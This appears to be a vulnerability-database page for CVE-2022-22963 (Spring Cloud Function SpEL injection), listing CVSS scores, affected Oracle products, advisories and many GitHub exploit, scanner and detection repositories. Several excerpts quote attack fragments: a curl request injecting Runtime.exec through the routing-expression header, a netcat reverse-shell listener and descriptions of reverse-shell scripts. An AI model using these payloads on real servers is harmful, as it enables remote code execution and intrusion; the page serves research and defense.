CVE-2022-22963

Published: 01/04/2022 Updated: 13/07/2023
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Vulnerable Product

vmware spring cloud function

oracle sd-wan edge 9.0

oracle retail xstore point of service 20.0.1

oracle communications cloud native core security edge protection proxy 1.7.0

oracle banking cash management 14.5

oracle banking trade finance process management 14.5

oracle banking credit facilities process management 14.5

oracle banking corporate lending process management 14.5

oracle banking supply chain finance 14.5

oracle sd-wan edge 9.1

oracle banking liquidity management 14.5

oracle banking liquidity management 14.2

oracle banking virtual account management 14.5

oracle financial services enterprise case management 8.1.1.0

oracle financial services enterprise case management 8.1.1.1

oracle financial services behavior detection platform 8.1.2.0

oracle financial services behavior detection platform 8.1.1.1

oracle financial services behavior detection platform 8.1.1.0

oracle mysql enterprise monitor

oracle communications cloud native core console 1.9.0

oracle communications cloud native core policy 1.15.0

oracle communications communications policy management 12.6.0.0.0

oracle communications cloud native core unified data repository 1.15.0

oracle communications cloud native core unified data repository 22.1.0

oracle communications cloud native core security edge protection proxy 22.1.0

oracle communications cloud native core policy 22.1.0

oracle communications cloud native core network slice selection function 1.8.0

oracle communications cloud native core network slice selection function 22.1.0

oracle communications cloud native core network repository function 1.15.0

oracle communications cloud native core network repository function 22.1.0

oracle communications cloud native core network function cloud native environment 22.1.0

oracle communications cloud native core network function cloud native environment 1.10.0

oracle communications cloud native core network exposure function 22.1.0

oracle communications cloud native core console 22.1.0

oracle communications cloud native core automated test suite 22.1.0

oracle communications cloud native core automated test suite 1.9.0

oracle product lifecycle analytics 3.6.1.0

oracle retail xstore point of service 21.0.0

oracle financial services enterprise case management 8.1.2.0

oracle financial services analytical applications infrastructure 8.1.2.0

oracle financial services analytical applications infrastructure 8.1.1.0

oracle banking origination 14.5

oracle banking electronic data exchange for corporates 14.5

oracle banking branch 14.5

oracle communications cloud native core policy 22.1.3

oracle communications cloud native core network function cloud native environment 22.1.2

Vendor Advisories

Synopsis Low: Release of OpenShift Serverless 1211 Type/Severity Security Advisory: Low Topic Release of OpenShift Serverless 1211 Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerab ...
Synopsis Low: Release of OpenShift Serverless Client kn 1211 Type/Severity Security Advisory: Low Topic Release of OpenShift Serverless Client kn 1211 Red Hat Product Security has rated this update as having a security ...
On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed: CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression. For a description of this vulnerability, see VMware Spring Framework Security Vu ...
CMIS is affected since it uses SpringFramework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963] ...
Two distinct spring project vulnerabilities were released recently with critical CVSS score and classified as zero-Day attacks. The two vulnerabilities are currently known as: Spring4Shell: There is currently no fix available for the Spring4Shell vulnerability. However we know that it affects products using the spring framework with a JDK 9 ...
CVE-2022-22963 Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2010-1622 Bypass ...

Mailing Lists

Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and u ...
Spring Cloud version 3.2.2 suffers from a remote command execution vulnerability ...

Github Repositories

Spring Cloud Function - SpEL Injection (CVE-2022-22963) cd spring-cloud-function-samples/function-sample-pojo && mvn clean package -DskipTests && java -jar target/function-sample-pojo-200RELEASEjar codeql database create spring-cloud-function-32X-DB -l java -j0 --search-path /path/to/codeql -c "

CVE-2022-22963 RCE PoC Minimal example to reproduce CVE-2022-22963 remote code execution in orgspringframeworkcloud:spring-cloud-function-core Exploit Run the server mvn spring-boot:run Make a request curl -X POST -H 'springcloudfunctionrouting-expression: T(javalangRuntime)getRuntime()exec("touch PWNED")' -d

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963) Vulnerable Application to CVE-2022-22963 CVE-2022-22963 Exploit Demo CVE-2022-22963mp4 Build docker pull me2nuk/cves:2022-22963 docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963 POC curl -X POST 0000:8080/functionRouter -H 

CVE-2022-22963 RCE PoC in python

CVE-2022-22963: Spring4Shell RCE Exploit This is a python implementation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=3.1.6 (for 3.1.x) and <=3.2.2 (for 3.2.x) Example Usage: # serving testsh on local webserver $ cat testsh #!/bin/bash whoami > /tmp/rce

Hack the Box - Machine - Inject

Inject Hack the Box - Machine - Easy apphacktheboxcom/machines/Inject Machine IP: 1012924493 Recon I start all CTFs by running nmap to view open ports and include the flags for running default scripts (-sC) and probing open ports for service/version info (-sV) Port 22 is almost always useless until we have credentials, so let's start with opening Burp Sui

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

Exploit for RCE in Spring Cloud (CVE 2022-22963) Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function See for details about the vulnerability here and here PoC Run the netcat on your host: $ nc -lvnp 9001 Run the exploit (example) with default port 9001 on attacker host: $ /exploitsh sitecom 101014122 ---[Rev

CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit

CVE-2022-22963 CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE vulnerability reproduction. Requires a Docker environment. Starting the vulnerable environment, method 1: git clone githubcom/RanDengShiFu/CVE-2022-22963git;cd CVE-2022-22963;bash Startsh Starting the vulnerable environment, method 2: rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone githubcom/N1ce75

CVE-2022-22963 research

SpringCloudFunction-Research CVE-2022-22963 research Environment: vulfocus/spring-cloud-function-rce:latest Cause: a parsing problem with the springcloudfunctionrouting-expression parameter in the Request Header, which allows payload injection attacks. Reference hosch3ngithubio/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ wwwkitploitcom/2022/03/spring-spel-0day-po

CVE-2022-22963 - Spring4shell To run the vulnerable SpringBoot application run this docker container exposing it to port 8080 Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 19216812:8080' -H $'springcloudfunctionrouting-expression

Rust-based exploit for the CVE-2022-22963 vulnerability

CVE-2022-22963 Exploit This repository contains a Rust-based exploit for the CVE-2022-22963 vulnerability found in Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions. The vulnerability allows remote code execution and access to local resources through a specially crafted Spring Expression (SpEL) used as a routing-expression. Description In Spring Cloud

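spring-cloud-function SpEL RCE reproduction environment. Config files for my GitHub profile.

spring-cloud-function SpEL RCE Vulnerability ID: CVE-2022-22963 A test environment for Spring Cloud Function SpEL expression injection. You can compile it yourself with IDEA, or download the release and start it directly. Runs on java11; start with java -jar spel-001-SNAPSHOTjar. Once set up, visit local port 8080

Spring Cloud Function SPEL expression injection vulnerability (CVE-2022-22963)

Spring Cloud Function SPEL expression injection vulnerability (CVE-2022-22963) The Spring Framework provides a comprehensive programming and configuration model for modern Java-based enterprise applications (on any kind of deployment platform). In Spring Cloud Function, the serverless framework in Spring Cloud, the apply method of the RoutingFunction class, the “springcloudfunctionrouting-expression” in the request header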

SpringCore-0day A Chinese security researcher user shared, and then deleted the information that by sending crafted requests to JDK9+ SpringBeans-using applications, under certain circumstances, that they can remotely: Modify the logging parameters of that application to achieve an arbitrary write Use the modified logger to write a valid JSP file that contains a webshell Use

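SPeL-injection-study(CVE-2022-22963) Divided into three parts: environment setup and vulnerability reproduction, studying the principle, and writing the POC. 1. Environment setup: create a new spring initializr project in IDEA; generate the jar package here; install jdk11 in the terminal; java -jar jojoSPeL-001-SNAPSHOTjar to deploy the jar package; visit 127001:8080 to verify; send the POC to verify POST /functionRouter HTTP/11 Host: 127001:8080 springcloudfunctionroutin

spring cloud function one-click exploitation tool! by charis, blog https://charis3306.top/

CVE-2022-22963 (spring cloud function sple rce) spring cloud function one-click exploitation tool! by charis, blog charis3306top/ Packaged as an exe file, ready to use out of the box. Commands usage: Spring-cloud-function-spel02exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD] spring cloud function one-click exploitation tool! by charis, blog ht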

This is a POC for CVE-2022-22963

CVE-2022-22963-Poc-Bearcules This is a POC for CVE-2022-22963. I wrote this in bash. I am new to scripting and this is my first script. Disclaimer >> I am not responsible for any misuse or abuse when using this POC; for learning and educational purposes only. Thank you

Scan systems and docker images for potential spring4shell vulnerabilities. Will detect in depth (layered archives jar/zip/tar/war) and scan for vulnerable Spring4shell versions. Binaries for Windows, Linux and OS X, but can be built on each platform supported by Golang.

spring4shell-scanner This scanner will recursively scan paths including archives for spring libraries and classes that are vulnerable to CVE-2022-22965 and CVE-2022-22963. Currently the allow list defines non exploitable versions, in this case spring-beans 5.3.18 and 5.2.20 and spring cloud function context 3.2.3

Spring Cloud Function Vulnerability (CVE-2022-22963) RCE This is a python implementation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=3.1.6 (for 3.1.x) and <=3.2.2 (for 3.2.x). Combination of multiple POCs online. Author: Randall Banner Date: 17/04/23 Description: Script creates shellsh in current directory, with a simple bash

First step we need to do is, recon PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 82p1 Ubuntu 4ubuntu05 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA) | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA) |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519) 8080/tcp open nagios-nsca Nagios NSCA |_http-title: Home

Spring Cloud Function SpEL - cve-2022-22963

Spring Cloud Function SpEL - cve-2022-22963 Build $ git clone githubcom/twseptian/cve-2022-22963git $ cd cve-2022-22963 $ docker build -t spring-spel-0day $ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day Payload springcloudfunctionrouting-expression:T(javalangRuntime)getRuntime()exec("ping -c5 172

CVE-2022-22963-Reverse-Shell-Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage Install the required Python libraries by running

CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.

CVE-2022-22963 Reverse Shell Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage To use this exploit, simply run the script with

An exploit for the CVE-2022-22963 (Spring Cloud Function Vulnerability)

Exploit-for-CVE-2022-22963 Exploit using curl to get a reverse shell in vulnerable spring cloud environments This exploit abuses the functionRouter URI, by injecting code into the eval function of the Spring Framework through a post request with a header that gives us Remote Code Execution (RCE) Created by Henri Vlasic Linkedin Arthur Valverde Linkedin

{ Spring Core 0day CVE-2022-22963 }

Spring Core RCE - CVE-2022-22963 Following Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core RCE The Circulating coding poc: The exploit has been uploaded as exppy The official Spring patch is also in active production Patch Links in Spring Production The vulnerability affects: jdk version 9 and above using Spri

CVE-2022-22963 Exploit Description In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. More details can be found in the CVE-2022-22963 Detail. Based on the PoC pr

CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable More information at wwwcyberkendracom/2022/03/rce-0-day-exploit-found-in-

Binaries for CVE-2022-22963

CVE-2022-22963 Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service Disclaimer: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk. Usage /CVE-2022-22963 -h Usage: CVE-2022-22963 [OPTIONS] Application Options: -u, --target-url= Target/Host url where 'Spring Cloud

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable Exploiting the vulnerability is quite easy to accomplish Here is reported the curl

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Spring4Shell RCE Demo

Spring4Shell RCE Demo for CVE-2022-22965 Types of demo spring-mvc (with spring-boot) deployed as a war to Apache Tomcat spring-boot war with jsp, to be run as java -jar spring-boot jar without jsp, to be run as java -jar While the first spring-mvc in Apache Tomcat is vulnerable, the latter two types -- where spring-boot runs in Embedded Tomcat Servlet Container -- do not app

Advance Spring4Shell RCE Vulnerability Scanner.

S4SScanner Advance Spring4Shell RCE Vulnerability Scanner S4SScanner is advance Spring4Shell RCE CVE-2022-22965 Vulnerability scanner that can search every url and check for vulnerability Main Features Web Crawler Scan Spring4Shell RCE Documentation install git clone githubcom/thenurhabib/s4sscannergit cd s4sscanner p

Lazy SPL to detect Spring4Shell exploitation

Spring4Shell-Detection with Splunk Lazy SPL to detect CVE-2022-22965 - Spring4Shell & CVE-2022-22963 exploitation Find more awesome Threat Hunting SPL queries, including BPFDoor detection here Detecting & Responding to Spring4Shell with Splunk | Medium Read my write up here Detecting & Responding to Spring4Shell with Splunk | Medium Detection for Spring

Spring PetClinic Sample Application Lacework Vulnerability Scanner There are many steps involved in building and deploying a containerized application, a complete container image lifecycle approach is key to managing software supply chain risks The Lacework inline remote scanner allows you to integrate Lacework security capabilities deeply into your software supply chain wor

Spring4Shell Burp Scanner

S4S-Scanner Burp Extension Spring4Shell Burp Scanner Extension Passive Scanner: It scan for keywords for Spring Boot error pages Active Scanner: It initialize Burp Collaborator and test /functionRouter path of the URL without any harmful activity for CVE-2022-22963, upload only like a text file for CVE-2022-22965 You can use with BurpSuite Extender and Jython Made with bare

Created after the release of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyzes their Manifest files.

springhound Created after the release of CVE-2022-22965 and CVE-2022-22963 Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used Unpacks JARs and analyzes their Manifest files Usage: /springhoundsh root_directory

Reproducing spring rce vulnerability and nuclei template

Spring RCE This repository provide vulnerable applications to CVE-2022-22963 and CVE-2022-22965 Also, You can find nuclei templates to check vulnerabilities CVE-2022-22965 vulnerable application original repository: Spring4Shell-POC Download Repository git clone githubcom/justmumu/SpringShellgit Steps For CVE-2022-22965 $ cd &

This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell".

Spring CVE This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell". CVE-2022-22963 In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted S

Spring4Shell Vulnerability Scanner for Windows

THIS SCRIPT IS PROVIDED TO YOU "AS IS" TO THE EXTENT PERMITTED BY LAW, QUALYS HEREBY DISCLAIMS ALL WARRANTIES AND LIABILITY FOR THE PROVISION OR USE OF THIS SCRIPT IN NO EVENT SHALL THESE SCRIPTS BE DEEMED TO BE CLOUD SERVICES AS PROVIDED BY QUALYS Direct Download Links githubcom/Qualys/spring4scanwin/releases/download/102/Spring4Scanzip Spring4Scanner D

try to determine if a host is vulnerable to SpringShell CVE‐2022‐22965 and CVE‐2022‐22963

check-springshell This tool will try to determine if the host it is running on is likely vulnerable to CVE-2022-22963, a SpEL / Spring Expression Resource Access Vulnerability, as well as CVE-2022-22965, the so-called "SpringShell" RCE vulnerability This works very similar to the check-log4 tool, whereby it traverses the filesystem looking for Java archives, cracks t

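GUI version of the open-source tool SpringBoot-Scan; if it is useful to you, please give it a Star, haha~ Note: this tool has exploits for the relevant vulnerabilities built in, so antivirus detections are normal! Using the new version of the tool: python3 mainpy Setting up the VulHub vulnerability test environment: git clone githubcom/vulhub/vulhubgit Install Do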

This enforces F5 WAF signatures for Spring4Shell and Spring Cloud vulnerabilities across all policies on a BIG-IP ASM device

f5-waf-enforce-sig-Spring4Shell This enforces signatures for the vulnerabilities Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963 across all policies on a BIG-IP ASM device Overview This script enforces all signatures present in the list below related to the vulnerabilities Spring4Shell and Spring Cloud across

Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29 This vulnerability is commonly referred to as "Spring4Shell" in the InfoSec community - an unfortunate name that calls back to the log4shell cataclysm, when (so far), impact of that magnitude has not been demonstrated I hope this repository helps you assess the situation

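Comprehensive Spring vulnerability exploitation tool

Spring_All_Reachable A graphical tool for quickly exploiting vulnerabilities in the Spring framework 📝 TODO Spring Core RCE; support more types of memory shells; support changing the memory shell password 🎬 Usage Spring Cloud Gateway command execution (CVE-2022-22947) Vulnerability description: Spring Cloud Gateway has a remote code execution vulnerability; the vulnerability occurs in Sp

SpringScan vulnerability detection Burp plugin

SpringScan Burp detection plugin Supported vulnerabilities: Spring Core RCE (CVE-2022-22965) Spring Cloud Function SpEL RCE (CVE-2022-22963) Spring Cloud GateWay SPEL RCE (CVE-2022-22947) Callback platforms: Dnglog (default) BurpCollaboratorClient Ceye Digpm; custom callback platforms are supported CVE-2022-22965 detection method Exploitation conditions: JDK9 or later; the Spring-beans package is used;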

Sentinel_Analtic_Rules #Test_Emotet Related IP addresses Description While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times

A collection of Github gists.

awesome-gists Terraform AWS WAFv2 for Log4JRCE (CVE-2021-44228, CVE-2021-45046) and Spring4ShellRCE (CVE-2022-22963, CVE-2022-22965)

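fscan Recent updates [+] 2022/6/30 POCs added: CVE-2021-21972-vmcenter-RCEyml CVE-2021-22005-vmcenter-upload-toRCEyml CVE-2022-22954-VMware-RCEyml CVE-2022-22963-Spring-SpEL-RCEyml [+] 2022/4/20 the poc module can take a specified directory or file, -pocpath poc path; ports can be given as a file, -portf porttxt; multi-threaded brute-force demo added to the rdp module, -br xx sets the thread count [+] 2022/2/25 added -m webonly, skip

Open-source penetration testing framework for SpringBoot, and exploitation tool for high-risk Spring-related vulnerabilities

✈️ 1. Tool overview During routine penetration tests I often come across microservices built with Spring Boot, so I wanted to make an open-source penetration testing framework for Spring Boot, mainly for scanning Spring Boot endpoints that leak sensitive information, and able to directly test Spring's related high-risk vulnerabilities. So I wrote this tool: SpringBoot-Scan [short name: “SB-Scan” (confused] Later

Awesome-Redteam [Disclaimer] The techniques, ideas and tools covered by this project are for learning only; no one may use them for illegal purposes or for profit, or for unauthorized penetration testing; otherwise the consequences are your own responsibility and have nothing to do with this project. Please read the laws and regulations before using this project. Quick navigation Common commands for offense, defense and penetration testing Quick reference for important ports and services Table of contents Awesome-Redteam Quick

RCE vulnerability in Spring Framework via Data Binding on JDK 9+ (CVE-2022-22965 aka "Spring4Shell")

CVE-2022-22965 aka "Spring4Shell" RCE vulnerability in Spring Framework via Data Binding on JDK 9+ The goal is to centralize as much of the publicly known information about the vulnerability to date as possible, and to know what actions to take in that case. Is my application vulnerable? The conditions (AND) that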

🔒 An Awesome List of SpringShell/Spring4shell resources

😎 Awesome lists about all things related to #Spring4Shell #SpringShell A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as Spring4Shell. Spring Project Official Spring project on published CV

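SBSCAN is a penetration testing tool focused on the spring framework; it can run springboot unauthorized-access scans and sensitive-information scans against specified sites, and is a combined tool for scanning and verifying spring framework vulnerabilities. [SBSCAN is a penetration testing tool focused on the spring framework that can scan springboot sensitive information/unauthorized for specified sites and scan and validate spring related vulnerabilities]

English README FAQ ✈️ 1. Tool overview SBSCAN: (for spring framework penetration testing this one tool is enough; if the tool is useful to you, give it a star🌟) SBSCAN is a penetration testing tool focused on the spring framework; it can run springboot unauthorized-access scans and sensitive-information scans against specified sites, and scan for and verify spring-related vulnerabilities. The most complete sensitive-path

Vuln-Environments.

To Save Some Vuln-Environments Jackson-databind deserialization vulnerability (CVE-2017-7525&CVE-2017-17485) Spring Cloud Function SpEL expression injection vulnerability (CVE-2022-22963) Spring Framework RCE (Spring4Shell) (CVE-2022-22965) Spring Security RegexRequestMatcher Auth-Bypass (CVE-2022-22978) Apache Commons-Configuration RCE (CVE-2022-33980) Fastjson 1280 deserialization vulnerability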

Awesome Splunk SPL hunt queries that can be used to detect the latest vulnerability exploitation attempts & subsequent compromise

Threat Hunting with Splunk Awesome Splunk SPL queries that can be used to detect the latest vulnerability exploitation attempts &, threat hunt for MITRE ATT&CK TTPs I'm including queries with regular expressions, so detection will be possible even if you haven't parsed the logs properly MITRE ATT&CK TTP & Detection Analytics TTP MI

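A knowledge repository for attack and defense

Awesome-Redteam [Disclaimer] The techniques, ideas and tools covered by this project are for learning only; no one may use them for illegal purposes or for profit, or for unauthorized penetration testing; otherwise the consequences are your own responsibility and have nothing to do with this project. Please read the laws and regulations before using this project. Quick navigation Common commands for offense, defense and penetration testing Quick reference for important ports and services Roadmap Table of contents Quick navigation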

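POC library that strengthens fscan's vulnerability scanning

fscan-POC POC library that strengthens fscan's vulnerability scanning Statement: these POCs are for learning and security testing only; illegal or malicious use has nothing to do with me!!! You are welcome to follow the chaosec public account. If there is a vulnerability POC you would like added, tell me via the public account or the project comments. 1. Usage: pull the fscan project to your machine, then find the path \fscan\WebScan\pocs\ and put this project's yml files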

Debug CVEs!

vulEnv All sourcecode and environment for CVE debug! Lists fastjson fastjson laravel CVE-2021-3129 shiro CVE-2016-4437 CVE-2020-13933 spring CVE-2022-22947 CVE-2022-22963 CVE-2022-22965 CVE-2022-22978 log4j cve-2021-44228 Template # CVE- ## Environment ## Run ## Breakpoints ## Reference

Hackthebox weekly boxes writeups.

HTB Write-ups Last update: Mailroom 🐧*nix Box Difficulty Writeup Foothold Privesc Medium Agile LFI Chrome Debug Mode AND Sudoedit CVE-2023-22809 Easy armageddon Drupal property injection: Drupalgeddon 2 snap install with sudo Easy Backdoor WP-Plugin:eBook Download 11

Extension for Dynatrace App Sec Reporting

Dynatrace AppSec Powerup V15 Automated Security Reporting Utility for for Dynatrace Security Install Drag this folder to a directory of your choice With python and pip installed, run pip install -r requirementstxt in a command line started in this directory Features Built with log4j in mind, the remediator provides the ability to: Tag CVE's within a tenant Manage CVE&

A list for Spring Security

SpringSecurity A list for Spring Security Spring Projects CVE Vulnerability Types Spring Cloud Function CVE-2020-22979 DoS Spring Cloud Function CVE-2022-22963 SpEL Spring Cloud Netflix Hystrix Dashboard CVE-2021-22053 SpEL Spring Cloud Netflix Hystrix Dashboard CVE-2020-5412 SSRF Spring Cloud Gateway CVE-2022-22947 RCE Spring Cloud Config CVE-2019-3799 Directo

Name URL Nmap githubcom/nmap/nmap pspy githubcom/DominicBreuker/pspy enum4linux githubcom/CiscoCXSecurity/enum4linux BloodHound githubcom/BloodHoundAD/BloodHound BloodHound Python githubcom/fox-it/BloodHoundpy Vulnerability Analysis Name URL Sparta githubcom/SECFORCE/sparta nikto githubcom/sullo/nikto Web Applicati

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification. Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. Feel free to submit a pull request or reach out to me on Twitter for suggestions. Every h

Methodology and scripts for the OSCP. Only valid and useful techniques for certification are included

OSCP preparation - Methodology & Scripts Enumeration - Initial phase WEB methodology Directory enumeration Subdomain enumeration Web information enumeration LFI bypass-LFI wrappers-LFI RCE in LFI Log Poisoning mail php execution XXE Unrestricted File Upload SNMP enumeration

Java vulnerability map, used to organize my own Java security knowledge stack

JavaVulnMap Java vulnerability map, used to organize my own Java security knowledge stack Application layer OWASP Top 10 2021-Broken Access Control 2021-Cryptographic Failures 2021-Injection 2021-Insecure Design 2021-Security Misconfiguration 2021-Vulnerable and Outdated Components 2021-Identification and Authentication Failures 2021-Software and Data Integrity Failures 2021-Security Logging and Moni

pocsuite3 (541 in total) Last checked: 2023-11-28 03:08:23 Collection records File name Collected at ssh_burstpy 2023-11-28 03:08:18 initpy 2023-11-28 03:08:15 tomcat-ajp-ghostcat_all_lfipy 2023-11-28 03:08:14 CVE-2021-46422py 2023-11-28 03:08:14 CVE-2022-26134py 2023-11-28 03:08:14 ftp_burstpy 2023-11-28 03:08:08 telnet_burstpy 2023-11-28 03:08:0

An exploit tool repository

Awesome-Exploit [Disclaimer] The techniques, ideas and tools covered by this project are for learning only; no one may use them for illegal purposes or for profit, or for unauthorized penetration testing; otherwise the consequences are your own responsibility and have nothing to do with this project. Please read the laws and regulations before using this project. A repository of vulnerability proof-of-concept / exploitation tools Updated irregularly Details of the POC/EXP for some of the vulnerabilities can be

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet

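vulcat can be used to scan web applications for common vulnerabilities with CVE, CNVD and similar identifiers; when it finds a vulnerability it returns the payload information. Some vulnerabilities also support an interactive command-line mode, allowing continued exploitation of the vulnerability

vulcat English version Official documentation (this tool is updated whenever I get around to it) Apart from the code being a "tiny" bit bad, the bugs being a "tiny" bit numerous, it being a "tiny" bit hard to use, and a "tiny" few other small problems, it's still alright, I guess. vulcat is a tool for scanning web vulnerabilities; it supports WAF detection, fingerprinting, POC scanning, custom POCs and other features. When vulcat finds a problem it outputs the vulnerability information,

Challenge walkthroughs for the Chunqiu Yunjing cyber range

Chunqiu Yunjing CVE-2022-32991 Web Based Quiz System SQL injection Register first, then log in. The eid parameter is vulnerable. Manual injection: guess the number of columns eci-2zeiglmgxybklc8oz8s6cloudeci1ichunqiucom/welcomephp?q=quiz&step=2&n=1&t=10&eid=5b141f1e8399e' or 1=1 order by 5 --%20 so there are 5 columns eci-2zeiglmgxybkl

A knowledge base of Vulhub vulnerability reproductions

Vulhub-Reproduce [Disclaimer] The techniques, ideas and tools covered by this project are for learning only; no one may use them for illegal purposes or for profit, or for unauthorized penetration testing; otherwise the consequences are your own responsibility and have nothing to do with this project. Please read the laws and regulations before using this project. Vulhub vulnerability reproductions, updated irregularly. Thanks to @Vulhub for providing the open-source vulnerability range. 0x01 Project navigation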

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 961 CVE-2022-0847-

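Penetration_Testing_POC A collection of POCs, scripts, tools, articles and other techniques used in penetration testing, shared as notes; additions are welcome. Check every tool for backdoors or other abnormal behaviour; running them all in a virtual environment is recommended. Penetration_Testing_POC Make good use of search [Ctrl+F] IOT Device&Mobile Phone Web APP Privilege-escalation helpers PC tools-small utilities collection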

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation github.com/vi3t1/qq-tim-elevation CVE-2

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 988 CVE-2022-0847-

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 975 CVE-2022-0847-

Goby POCs collected from the public internet, plus some POCs I added myself

